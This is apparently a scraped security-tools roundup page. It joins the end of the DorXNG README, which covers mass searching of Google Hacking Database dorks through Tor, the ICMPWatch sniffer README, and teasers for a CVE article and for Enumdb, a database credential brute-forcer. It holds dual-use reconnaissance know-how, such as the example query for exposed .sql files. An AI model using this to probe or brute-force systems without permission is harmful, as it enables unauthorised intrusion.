-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Ver bose Output - Displays Raw JSON Output

Tips 

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries. ο˜‰

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. 

Most often, the more passes you make over a search query the more results you'll find. 

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all. ο”ŽοŒŽ

Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename, the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations seperate it's there for you.

Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.

If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor curcuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... Yet... ο˜‰ How many you run really depends on what you're doing. Each container uses approximately 1.25GBs of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor curcuit thats refreshing every 10 seconds.

When running --serverlist mode disable the --timeout feature so there is no delay between requests (The default delay interval is 4 seconds).

Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit... ο”ο˜‰

The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. 

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc... ο‘ο˜…

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.

The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you... ο˜‰ Our ghdb.db file contains over one million entries and counting!  You can download it here ghdb.db if you'd like a copy. ο˜‰

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'

A rewrite of DorXNG in Golang is already in the works. ο˜‰ (GorXNG? | DorXNGNG?) ο˜†

We're gonna need more dorks... ο˜… Check out DorkGPT ο‘€

Examples ο’‘

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  1. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python dnssnif.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving Captured Packets
python icmpwatch.py -i eth0 -c captured_packets.pcap


Top 5 Critical CVEs Vulnerability from 2019 That Every CISO Must Patch Before He Gets Fired !

The number of vulnerabilities continues to increase so much that the technical teams in charge of the patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore we have taken the time to review the profile of the most critical vulnerabilities & issues that impacted year 2019. After this frenzy during [&hellip

Enumdb Beta – Brute Force MySQL and MSSQL Databases

Enumdb is brute force and post exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials. By...

[[ This is a content summary only. Visit my website for full links, other content, and more! ]]
❌